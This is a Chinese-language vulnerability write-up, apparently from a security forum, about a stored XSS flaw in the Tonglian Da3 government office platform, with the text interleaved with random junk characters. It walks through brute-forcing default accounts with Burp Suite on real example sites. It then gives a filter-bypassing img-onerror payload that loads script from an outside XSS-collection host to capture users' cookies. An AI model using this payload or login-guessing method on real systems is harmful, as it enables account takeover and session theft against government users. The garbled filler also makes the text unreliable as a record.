- e* S5 ~' i; W& a9 g( H8 q! r0 g0 [3 J x
2 M( i% ~5 G) O0 G 同联Da3协同办公平台后台通用储存型xss漏洞8 \' G2 x- N) C" C2 v; N$ l C' ?$ k
" [) O* J3 A. Y" T
. a: [+ z3 L0 k. B# t 平台简介:9 a( p- l+ ?% T
5 J: X O' ?/ c
/ ?3 u7 ], t/ y n4 |
# M% @7 @+ L o( c
$ R( u2 l$ \) L! D# e1 P T
) F) x" n" y M# H/ [( G. S9 Y
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. Z; z+ X; ?) k: m- o
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ M2 b5 O4 I9 W) a% O7 m* y; }
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' H! N" L: H3 t# d+ E
" c2 i) Y8 p3 I% }
. j0 r" `$ f; {/ f8 u' u7 R
% n8 d8 L3 s8 g- c0 k; V
! O: d. N' Y1 s& r
, g, Y9 A+ y/ z O9 X" B7 ~- `/ w 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:) A0 m# }6 |" t0 H7 h# b% t
5 B: v2 J8 s( c T* {6 K: _
$ [4 q" |; a8 L) c8 P2 t1 W7 G( k
6 p& v4 L& c: [( o7 S
$ H9 u8 R6 A l
& d2 T1 c$ I; O% p( U
http://1.1.1.1:7197/cap-aco/#(案例2-) g- S. v* Z. {' v" H
" K/ y- v# E: q6 ?% j7 L+ T 4 B2 p m7 J& c2 G) ~/ x) ?. W
http://www.XXOO.com (案例1-官网网站)
) o* c2 Z1 C4 E6 |
3 B. @' m/ {) z# {( U ) v& ^+ e( G( E# H' b
漏洞详情:# S/ z& b; ]+ K5 l0 h7 P
4 s4 c( L; \5 C. g$ u
3 V: w' r. x# L. w$ C; I" C 案例一、
/ N4 V. T" f- N) z: x
( }, F6 `3 ?0 y0 Q: F1 ~ : O1 A: P; G+ ] V1 i$ [! e2 Z
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
& S; q1 K3 v* w7 U
% O0 |+ ^6 I( c6 |1 U( C" B# @
8 @. I* f# F0 ]4 j1 h6 q
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:- d i: y6 Y. ]$ O. }
+ n0 b h8 A& ~8 P0 Q; M! @
) R6 L- H" o# h* M9 a$ e
# u& q. k# a* }( a: H1 R
! i4 c8 x+ l6 ?) k$ F' O8 L: x , Z* e3 o& q* q6 w1 M4 A9 b6 H
; K1 {0 S" T2 ?
$ G8 }2 U# o6 b u) o |% ^ ) l% ~8 {4 y# j& I* g! c9 X u# _
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ! p' p: p; h+ z# E6 t
# t3 _8 V1 G# ^4 w/ U8 s9 p) }5 }
1 N9 w% ?( u3 ?* |2 V8 n0 `
/ q. g2 p- o$ j9 L: {$ L" d
) X. V( @* s$ P7 L' G# k
3 N) }, \" ~& h; y$ @ b1 x* K
' Z6 M4 s k9 T
& f8 m/ ?" Q: U. P% X3 I
1 W' e+ ^1 `" a 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 9 i' u, D/ F9 V, ?9 P% E
- L9 {. a( f* U1 I) D% F( _) v
7 l$ y- w# C; Z' F
! G0 ?- r& f: K( v/ l, F
) c2 P7 U1 l$ R7 s) V) d2 i
- |# M9 O' k/ |: x% |* ~0 Z, ? <img src=x
8 A B* q- Q2 y4 Y6 eonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 8 v) w6 w D7 K* X' e7 k, c
/ `0 X5 {; j/ q, O- ^
, U2 s' `3 j3 M* A
! p8 V9 Q; t+ ~" _/ G1 n
* C2 ^1 U7 [3 c: a
; W% v( x. y* {4 Z$ U) M
然后发送,接收cookie如图:
3 R) _4 _; z2 |; d0 G/ y3 p* l
4 G$ d. T) @) }/ z( i8 L
9 w% J5 T5 y0 g5 j9 @# A( B
( c) ]5 }9 Q" s* S5 }! G
* H$ M) a, y- Y2 G8 V' G% I
* g6 t* ]0 I$ C0 M 3 F8 V& |- R( p3 W' Z r
% h8 }: W$ s* G0 Z" u, o9 W* D
- z" K1 J; l( L* g% K 5 k- B0 A, K* w' L
* f/ ~. u4 x0 v
2 x; D7 R" _0 l9 c5 J
8 O. O1 L( e+ H) I
; m; h8 m4 U# Q( D% w. Q4 b 5 S& L- C! ^( K; W& y
6 K' t4 f6 Z0 {3 D# ?" _
8 e& k3 Y3 |; L' K# n( H
- r: p8 {1 c! ?9 J, y: R" _! A
: X: s% k/ _# h- l! P
# j3 z9 l8 R: c8 z" Q) h ' L/ J5 c: t# M, R x% V
. E8 k6 b' G$ v: q1 r+ o
% E/ @. m& G3 U# e s
- x: P9 a) H0 t6 v$ x 案例2、 5 Y. ?! d% _& a) m9 b* s
3 J# k. C2 ^! D7 y( E
7 r. ]; ?+ j6 A5 o( Q" E7 E
前面步骤都一样,下面看效果图:
4 \) ]* l5 p l8 o h @3 v4 {
% B- F4 x W9 A, M8 y6 w. V
) r' n& {/ b& t |+ I# Y9 N& t1 R
( m, W8 s9 Q1 R$ N% D( Y
7 `3 R: i- Q. I2 ^; K4 t1 H
+ Z* b! U( s' q0 c
( Z. q* z" m; n r# S7 j+ V4 A
5 P+ u: G& e; C: Z
# }0 e) c7 P+ J/ {, W 8 j$ a5 L, V% u' z: Y1 l
8 M) Y2 t3 N0 z7 W3 D
7 ]* ?# D/ p: C4 A8 W ; S9 F, T N' l: B- a
* I+ t& F% s/ r8 S3 ] 9 ]; E# k* F5 k) U/ ^- }2 ~& E
' G: d) L3 W+ w. F: b/ M/ {; K4 l- `
0 ?8 ~( B9 b' R0 {; q3 s2 Z3 t
+ X$ I( l$ I _* j; V, X
& l. Q Q5 [- q! E. @
' O+ `! [* G% T5 m' q% h3 c 2 A4 }+ Q% E& {4 Z3 ~ e
# [, M1 @1 v/ F& n4 ~
0 m' J" J0 o/ W, i# n5 N/ Q5 l
+ q# L1 j6 Y2 w) f, C" }
( H- H& `7 W, A$ L
: }3 |1 e% G* C) d0 u+ K & ^ x0 _$ ]0 o3 C* u
. I% c( |9 o$ z+ _, m7 w
, b/ Z2 Z8 N. q6 ]